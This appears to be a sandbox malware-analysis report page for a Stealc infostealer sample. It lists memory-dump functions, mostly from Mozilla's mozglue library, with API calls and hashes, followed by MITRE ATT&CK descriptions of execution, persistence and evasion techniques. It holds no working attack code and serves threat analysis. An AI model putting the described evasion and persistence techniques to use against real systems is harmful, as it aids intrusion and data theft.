Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
String ID:
API String ID: 1951318356-0
Opcode ID: 24510df7e55911d09d9c2344bb8195957e7fbe7e304d94cf5adf1cabccea6657
Instruction ID: 2581d364f5d102de6b3fd8531aa8d72c8e1219999e806834f7419b78fcbdba79
Opcode Fuzzy Hash: 24510df7e55911d09d9c2344bb8195957e7fbe7e304d94cf5adf1cabccea6657
Instruction Fuzzy Hash: F7112BB5E002498FCF04DFA8D8899BFBBB5FF49304700042AE50597311EB39E909CBA1

Function 6BAEEB00 Relevance: 6.0, APIs: 4, Instructions: 30threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAEEB11
AcquireSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAEEB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6BAEEB3C
ReleaseSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAEEB5B
GetCurrentThreadId.KERNEL32 ref: 6BAEEBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BAEEBAC
GetCurrentThreadId.KERNEL32 ref: 6BAEEBC1
AcquireSRWLockExclusive.KERNEL32(6BB2F4B8,?,?,00000000), ref: 6BAEEBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BAEEBE5
ReleaseSRWLockExclusive.KERNEL32(6BB2F4B8,00000000), ref: 6BAEEC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BAEEC46
CloseHandle.KERNEL32(?), ref: 6BAEEC55
free.MOZGLUE(00000000), ref: 6BAEEC5C

Strings

[I %d/%d] profiler_start, xrefs: 6BAEEBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BAEEA9B

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$CurrentThread$AcquireRelease$?profiler_init@baseprofiler@mozilla@@CloseHandleObjectSingleWait_getpidfreememset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 2885072826-1186885292
Opcode ID: fc4ea83b0d695ba361f488433345769e2e36aa67d54f5404cf1dfc66c009b734
Instruction ID: f599ed9fa034027550f7de026a1612c0b2aec9f19abcd59a52a0aafe6be7a284
Opcode Fuzzy Hash: fc4ea83b0d695ba361f488433345769e2e36aa67d54f5404cf1dfc66c009b734
Instruction Fuzzy Hash: 5BF0A7316002509BEF105F69D845BB57764AB82695F004027E915D3240CBFAA445C771

Function 6BAA9A20 Relevance: 5.3, APIs: 4, Instructions: 338COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6BAA9B2C
memcpy.VCRUNTIME140(6BAA99CF,00000000,?), ref: 6BAA9BB6
memcpy.VCRUNTIME140(?,?,?), ref: 6BAA9BF8
memcpy.VCRUNTIME140(?,?,?), ref: 6BAA9DE4

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 5256052bdb1cb6596c4562d8f26662719e1bf12b4f74f94a926d109c530e4a3d
Instruction ID: 3752616d5f66d5517bd1efb2a118928abf38b09e93aead47fd78538abd1aade6
Opcode Fuzzy Hash: 5256052bdb1cb6596c4562d8f26662719e1bf12b4f74f94a926d109c530e4a3d
Instruction Fuzzy Hash: 9BD15C71A002099FCF14CF69C981AAEBBF2FF88314F188529E955A7351D735ED91CBA0

Function 6BAF0A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 6BAB37F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6BB0145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6BAB380A

Part of subcall function 6BAE8DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6BB006E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6BAE8DCC

Part of subcall function 6BAF0B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6BAF138F,?,?,?), ref: 6BAF0B80

?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6BAF138F,?,?,?), ref: 6BAF0B27
free.MOZGLUE(?,?,?,?,?,6BAF138F,?,?,?), ref: 6BAF0B3F

Strings

baseprofiler::profiler_capture_backtrace, xrefs: 6BAF0AB5

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
String ID: baseprofiler::profiler_capture_backtrace
API String ID: 3592261714-147032715
Opcode ID: 75bc2cb2abd23bfa534182d56236b8f0104f3b05b094ddfc8892fa479a4ff239
Instruction ID: 6af01c259562278b477ca0f307c992c05cd436beb9c02fabfdd155da2bb03bdc
Opcode Fuzzy Hash: 75bc2cb2abd23bfa534182d56236b8f0104f3b05b094ddfc8892fa479a4ff239
Instruction Fuzzy Hash: CC21B274A002059BDF14DF64C991BFFB3BAEF85708F44046DE8159B341DB79A982CBA1

Function 6BAAF180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 6BAAF19B

Part of subcall function 6BACD850: EnterCriticalSection.KERNEL32(?), ref: 6BACD904
Part of subcall function 6BACD850: LeaveCriticalSection.KERNEL32(?), ref: 6BACD971
Part of subcall function 6BACD850: memset.VCRUNTIME140(?,00000000,?), ref: 6BACD97B

mozalloc_abort.MOZGLUE(?), ref: 6BAAF209

Strings

d, xrefs: 6BAAF1F5

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: 3538c876ed2bca0385675c26bd55eb1c82145dfff921a3d5f9f7fa5134b56883
Instruction ID: 1c1e7f727603d1b0978aa5a3d45bb9f81bab0219e3240c60a9c52dbe3bf28374
Opcode Fuzzy Hash: 3538c876ed2bca0385675c26bd55eb1c82145dfff921a3d5f9f7fa5134b56883
Instruction Fuzzy Hash: 17115C32E0064987EF088F68D9621FEB765DF96208B45511DDC45EB211EB76DDC4C3A0

Function 6BABCA10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?), ref: 6BABCA26

Part of subcall function 6BABCAB0: EnterCriticalSection.KERNEL32(?), ref: 6BABCB49
Part of subcall function 6BABCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6BABCBB6

mozalloc_abort.MOZGLUE(?), ref: 6BABCAA2

Strings

d, xrefs: 6BABCA6C

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeavemallocmozalloc_abort
String ID: d
API String ID: 3517139297-2564639436
Opcode ID: 8de94d1b07c33e37fb0a3a8bb78eb1d68f3356f38f3417b2d9edc42649f230bb
Instruction ID: 802ab8d1d578be0a17a4c659f822add04a3ee7b65eed1314db23d36f198ae5d7
Opcode Fuzzy Hash: 8de94d1b07c33e37fb0a3a8bb78eb1d68f3356f38f3417b2d9edc42649f230bb
Instruction Fuzzy Hash: 1F112531D00A9893DF01CB69D8514FDB37AEF96204F45821DDC55A7212FB79E5C4C380

Function 6BAC1A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

realloc.MOZGLUE(?,?), ref: 6BAC1A6B

Part of subcall function 6BAC1AF0: EnterCriticalSection.KERNEL32(?), ref: 6BAC1C36

mozalloc_abort.MOZGLUE(?), ref: 6BAC1AE7

Strings

d, xrefs: 6BAC1AB1

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CriticalEnterSectionmozalloc_abortrealloc
String ID: d
API String ID: 2670432147-2564639436
Opcode ID: aa86d2eeda283fdc68ebfc05a6f7a4f5df0a7ec726a2a91812689c8e67948976
Instruction ID: d1f4a9bc684d9aa6f0fd9a613339c655f4c42e48d9fb2ee5edb8541f337f4c0f
Opcode Fuzzy Hash: aa86d2eeda283fdc68ebfc05a6f7a4f5df0a7ec726a2a91812689c8e67948976
Instruction Fuzzy Hash: 8B115531E0066C93CF048BA9C8114FFB3B5EF95204F498619ED59AB212FB76E5C4C381

Function 6BB05900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6BB251C8), ref: 6BB0591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6BB0592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6BB05915

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: ec2720eb3e81439dfbcb5b8bb50e9ffb272162457271781254fdd8def0bce298
Instruction ID: 2190406119997c8089c2f65c74f3fa126d8cd61555a6456763cec8c617a43a80
Opcode Fuzzy Hash: ec2720eb3e81439dfbcb5b8bb50e9ffb272162457271781254fdd8def0bce298
Instruction Fuzzy Hash: B6E04830104280B7DB115B69C5487757FD4FB17736F044545E66993AD1C7BAE840C795

Function 6BB059C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6BADE56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6BB05A47
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6BADE56A,?,|UrlbarCSSSpan), ref: 6BB05A5C
free.MOZGLUE(?), ref: 6BB05A97
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6BB05B9D

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: free$mallocmemset
String ID:
API String ID: 2682772760-0
Opcode ID: 2b07f16b3b72ea67d89e4cf0955b383610b0a714d2d778437fbb0f2226246bd0
Instruction ID: 81d6146c006584f01d39f4655a1d11277b67510815da93f3e241fdc014ee8999
Opcode Fuzzy Hash: 2b07f16b3b72ea67d89e4cf0955b383610b0a714d2d778437fbb0f2226246bd0
Instruction Fuzzy Hash: 705160705087409FD700CF29C8C072BBBE5FF89318F04896EE9899B246DB78D945DB66

Function 6BAB23D8 Relevance: 5.1, APIs: 4, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e90e95dd23e304f81111675c8e63f0c4e7848c16a158903fa0934a0142ea48c6
Instruction ID: 3f4c4894c4ee64e5fd25af3e79a18644f3759299e880965637165e0c4eeca272
Opcode Fuzzy Hash: e90e95dd23e304f81111675c8e63f0c4e7848c16a158903fa0934a0142ea48c6
Instruction Fuzzy Hash: D75190B1A00306DFDB04CF18C990B9ABFB5BF48314F59826ED9299B341D779E891CB90

Function 6BB06180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6BB061DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6BB0622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6BB06250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BB06292

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 9b2d82107006802517d07f084653657c01cba2b9f5e906ae77e7e5e49fb7f988
Instruction ID: ffce8635fbd03c61df41c143e0355a083c063890b54b356beba43e3fe08822b8
Opcode Fuzzy Hash: 9b2d82107006802517d07f084653657c01cba2b9f5e906ae77e7e5e49fb7f988
Instruction Fuzzy Hash: 8F313571A00A4A8FDB04CF2CD880ABA77E9FF95304F10817AC55AC7251EB35E698CB50

Function 6BABBBE0 Relevance: 5.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BABBBF4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BABBC66
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BABBC96
memcpy.VCRUNTIME140(00000000,00000010,0000001F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BABBCCE

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 248630a0537a6c40e0808426eef8c8e140085c8872715c0d25e82bcec8d66f14
Instruction ID: 262eb4515aed8a5d7b7eb4065c7c0f9b67525ccf12ba755a343a7eb36a5f8da6
Opcode Fuzzy Hash: 248630a0537a6c40e0808426eef8c8e140085c8872715c0d25e82bcec8d66f14
Instruction Fuzzy Hash: 6E213471A002048BFB10CF3ACCC536E72EDEB8A304F944A39D96AD6351EE75E5848361

Function 6BAA39A0 Relevance: 5.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BB2E744,6BB07765,00000000,6BB07765,?,6BAC6112), ref: 6BAA39AF
LeaveCriticalSection.KERNEL32(6BB2E744,?,6BAC6112), ref: 6BAA3A34
EnterCriticalSection.KERNEL32(6BB2E784,6BAC6112), ref: 6BAA3A4B
LeaveCriticalSection.KERNEL32(6BB2E784), ref: 6BAA3A5F

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: aa0dec89f9c51cfb603fbe2965432db8731bb31c9b658d1f4885753ce570a2ba
Instruction ID: e79af2966d540503c1cbba516902bae4633c85a10d35eebd54f03e7645d8c09b
Opcode Fuzzy Hash: aa0dec89f9c51cfb603fbe2965432db8731bb31c9b658d1f4885753ce570a2ba
Instruction Fuzzy Hash: 1E210736A117018FCF359E76C451A3D73E1EF45750728062AC5A987650DB3AE8818761

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

